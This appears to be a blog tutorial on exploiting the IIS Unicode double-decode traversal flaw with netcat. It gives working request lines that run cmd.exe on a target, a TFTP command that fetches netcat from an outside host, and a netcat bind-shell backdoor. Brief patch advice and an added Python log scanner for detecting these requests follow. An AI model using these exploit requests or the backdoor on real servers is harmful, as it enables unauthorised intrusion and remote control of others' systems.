In the last post we looked at the directory traversal (Unicode) vulnerability and what it is; in this netcat tutorial we will see how netcat can be used to exploit it. Before we proceed I want to make clear that this is one of the best-known attacks on IIS servers using netcat, and you will no doubt find this tutorial as-is in many books on hacking web servers, so if you have already read those, this will be nothing new for you. OK, let's proceed to the tutorial.
First of all you must be sure that the target is running a vulnerable IIS version, so you will have to do some banner grabbing after scanning the victim's ports. You can also grab the banner with netcat using the following command:
C:\>nc -v -n IP_address port_number
Once you have confirmed that the victim is running a vulnerable IIS server, it is time to check whether it accepts a malformed URL. To do so, send the malformed URL to the victim with the following request:
GET http://IP_address/scripts/..%255c ../wininit/system32/cmd.exe?/c+dir+c:
If the command's output comes back, the victim is vulnerable. Now it is time to backdoor the server by uploading netcat to it. Netcat can be uploaded using TFTP, by integrating the TFTP command into the exploit URL:
GET http://IP_address/scripts/..%255c ../wininit/system32/cmd.exe?/c+TFTP+-i+IP_address+GET+nc
Once netcat is uploaded we can use it as a backdoor (see the netcat backdoor tutorial). Now run the following command on the victim using the same exploit URL:
nc -L -p port -d -e cmd.exe
Once done, it's your time to play inside.
To protect against this attack:
-Update to Windows 2000 SP3 if you are still using Windows 2000 Server.
-Apply the relevant patches on Windows 2003.
-Better still, upgrade IIS to IIS 7.
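To turn the malformed-URL checks above into something a defender can run, here is an added Python example (not from the original post) that scans web-server request lines and flags the double-encoded `%255c` traversal (it needs two decode passes: `%255c` to `%5c` to `\`), the overlong-UTF-8 form from the previous post, and any request that reaches for cmd.exe. The request lines are constructed samples, and the function names are my own.

```python
import re
import urllib.parse

# Constructed sample request lines in the form a web server logs them (not real log data).
SAMPLE_REQUESTS = [
    "GET /scripts/..%255c../wininit/system32/cmd.exe?/c+dir+c: HTTP/1.0",
    "GET /scripts/..%c0%af../wininit/system32/cmd.exe?/c+dir+c: HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "GET /scripts/report.asp?id=5 HTTP/1.0",
]

# '..' followed by a slash, a backslash, or the overlong UTF-8 encodings of
# '/' (C0 AF) and '\' (C1 9C) that the IIS Unicode traversal bug accepted.
TRAVERSAL = re.compile(rb"\.\.(?:[\\/]|\xc0\xaf|\xc1\x9c)")
SHELL_EXEC = re.compile(rb"cmd\.exe", re.IGNORECASE)

def decode_fully(path: bytes, max_rounds: int = 3) -> tuple:
    """Percent-decode until the value stops changing and report how many passes
    were needed; %255c -> %5c -> backslash takes two, which is itself a signal."""
    rounds = 0
    while rounds < max_rounds:
        decoded = urllib.parse.unquote_to_bytes(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify_request(line: str) -> dict:
    """Examine one 'METHOD path HTTP/x' request line and return the flags raised."""
    parts = line.split(" ")
    if len(parts) < 2:
        return {"path": line, "rounds": 0, "flags": ["malformed"]}
    decoded, rounds = decode_fully(parts[1].encode("latin-1"))
    flags = []
    if rounds >= 2:
        flags.append("double-encoded")
    if TRAVERSAL.search(decoded):
        flags.append("traversal")
    if SHELL_EXEC.search(decoded):
        flags.append("cmd.exe")
    return {"path": parts[1], "rounds": rounds, "flags": flags}

def suspicious_requests(lines):
    """Return only the request lines that raised at least one flag."""
    results = [classify_request(line) for line in lines]
    return [r for r in results if r["flags"]]
```

Calling `suspicious_requests(SAMPLE_REQUESTS)` returns the two traversal lines and nothing for the clean ones; the same check can be run over the path field of real IIS log entries.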